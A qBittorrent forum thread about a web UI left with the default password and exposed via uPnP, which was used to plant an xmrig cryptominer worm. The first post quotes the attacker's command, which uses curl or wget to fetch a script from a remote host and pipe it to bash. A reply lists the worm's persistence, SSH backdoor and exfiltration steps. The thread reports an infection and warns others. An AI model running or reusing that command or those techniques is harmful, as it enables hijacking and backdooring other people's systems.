qBittorrent official forums

Hello,

I have an ubuntu proxmox instance and i installed the web version of qbittorrent.
So yesterday I saw my CPU maxing out, cooming to find out that a proccess called xmrig is eating my cpu up.
So I got infected by a mining worm

I found out the infection vector
I left the default password (1st mistake)
The main issue is that qbittorrent exposes the port 8080 to the interntet automaticaly via uPnP.

And an attacker put this in the qbittorrent settings (Run external program on torrent completition)
bash -c "(curl -s -L http://cdnsrv.in/update.sh || wget -O - http://cdnsrv.in/update.sh) | bash"

So yeaaahh..... Please dont expose the 8080 port to the internet and disable uPnP. This feauture should be opt in not default.

to remove the worm run ( I copied this directly from the worm script)

Never leave the Web UI just exposed on the open internet. That's just asking for trouble. :/

Use SSH tunneling, firewalling (whitelist your IP), etc etc.

Thanks for letting us know though, I've seen very similar reports on the forums too.

The script mentioned appears to be designed to set up and run a cryptocurrency mining program without the user's consent or knowledge, specifically the Monero (XMR) miner called "xmrig," likely for the C3Pool mining pool. It's quite extensive and performs a series of actions to ensure the miner is properly downloaded, configured, and run on the system.

Here's a breakdown of what the script is doing:

1. The script begins with a shebang (`#!/bin/bash`), indicating that it should be executed using the Bash shell.

2. It defines a variable `WALLET` which seems to contain a cryptocurrency wallet address.

3. The script sets the `PORT` variable to `15555`.

4. It exports a custom `PATH` to include additional directories (`/bin`, `/usr/bin`, etc.).

5. There's a block that attempts to determine the user's home directory and sets it as `HOME`. It checks if `HOME` is empty, and if so, it assigns it based on the user's privileges and user name.

6. The script ensures that the user's home directory exists and creates it if not.

7. It sets up SSH keys, specifically adding an RSA public key to the `authorized_keys` file.

8. A function called `__curl` is defined. This function is used to perform a simple HTTP GET request and read the response.

9. The script stops and disables any previous instances of the `c3pool_miner.service` and `xmrig.service`.

10. It clears any iptables rules (firewall rules).

11. It removes various directories and files related to the `c3pool` and `xmrig` miners, presumably to clean up any previous installations.

12. It downloads an advanced version of the `xmrig` miner from a specific URL and unpacks it to `$HOME/.c3pool`.

13. The script checks if the downloaded `xmrig` binary is functional. If not, it attempts to download the latest version of the stock `xmrig` miner and unpacks it.

14. The script modifies the `config.json` file for the miner, setting parameters such as donation level, mining URL, wallet address, and other settings.

15. It creates a script named `miner.sh` in the `$HOME/.c3pool` directory that checks if the miner is already running and starts it if not.

16. If the user has sudo privileges and the system has enough memory, it enables huge pages for improved performance.

17. The script appends a command to the user's `.profile` file to automatically start the miner in the background when the user logs in.

18. The script sends system information (IP, hostname, etc.) to a remote server.

19. It modifies SSH settings to allow root login via SSH key authentication.

20. The script ends.

In summary, this script automates the setup of the Monero (XMR) mining software "xmrig" for the C3Pool mining pool. It handles downloading, configuring, and running the miner, and also performs some system configuration changes for optimal mining performance.

Oh this was the default password on WebUI.
It even received a CVE as a security risk.

The new versions generate a strong password instead to safeguard users.